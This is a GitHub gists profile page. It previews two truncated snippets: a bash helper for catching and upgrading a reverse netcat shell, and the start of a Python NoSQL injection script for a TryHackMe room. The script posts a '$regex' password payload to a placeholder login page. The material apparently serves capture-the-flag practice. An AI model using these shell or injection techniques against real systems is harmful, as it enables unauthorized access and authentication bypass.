Skip to content

Instantly share code, notes, and snippets.

View Esonhugh's full-sized avatar
💭
I may be slow to respond.

Esonhugh Skyworship Esonhugh

💭
I may be slow to respond.
View GitHub Profile
@Esonhugh
Esonhugh / pwnsh.sh
Last active May 9, 2022 23:02
pwnsh for good wraper for the reverse netcat shell
function pwnsh(){
case "$1" in
nc)
rlwrap $*
;;
tty)
stty -raw echo;fg
;;
re)
@Esonhugh
Esonhugh / exploit_nosqli.py
Last active November 15, 2021 08:15
Simple Nosqli injection Basic - Tryhackme Rooms
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, requests
target = "http://<target>/login.php"
post_form = 'user=admin&pass[$regex]={}&remember=on'
post_form = post_form.replace("admin","pedro")
header = {